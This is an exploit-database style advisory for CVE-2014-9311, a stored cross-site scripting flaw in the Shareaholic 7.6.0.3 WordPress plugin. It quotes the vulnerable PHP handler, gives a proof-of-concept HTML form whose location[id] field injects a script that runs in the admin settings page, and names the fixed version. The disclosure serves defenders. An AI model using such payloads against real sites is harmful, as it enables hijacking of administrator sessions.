Skip to content
cyberexploits
webappphptext

WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Publié le 2015-04-08

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/36674.txt7eac4c3a
raw
# Exploit Title: Shareaholic 7.6.0.3 XSS

# Date: 10-11-2014

# Software Link: https://wordpress.org/plugins/shareaholic/

# Exploit Author: Kacper Szurek

# Contact: http://twitter.com/KacperSzurek

# Website: http://security.szurek.pl/

# CVE: CVE-2014-9311

# Category: webapps



1. Description



ShareaholicAdmin::add_location is accessible for every registered user.



File: shareaholic\shareaholic.php



add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));





$_POST['location'] is not escaped.



File: shareaholic\admin.php



public static function add_location() {

	$location = $_POST['location'];

	$app_name = $location['app_name'];

	ShareaholicUtilities::update_options(array(

	  'location_name_ids' => array(

	    $app_name => array(

	      $location['name'] => $location['id']

	    ),

	  ),

	  $app_name => array(

	    $location['name'] => 'on'

	  )

	));



	echo json_encode(array(

	  'status' => "successfully created a new {$location['app_name']} location",

	  'id' => $location['id']

	));



	die();

}



http://security.szurek.pl/shareaholic-7603-xss.html



2. Proof of Concept



Login as regular user (created using wp-login.php?action=register) then:



<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">

    <input type="hidden" name="action" value="shareaholic_add_location">

    <input type="hidden" name="location[app_name]" value="recommendations">

    <input type="hidden" name="location[name]" value="post_below_content">

    XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">

    <input type="submit" value="Hack!">

</form>



XSS will be visible for admin:



http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings

  

3. Solution:

  

Update to version 7.6.1.0

https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip

https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/
Voir sur GitHub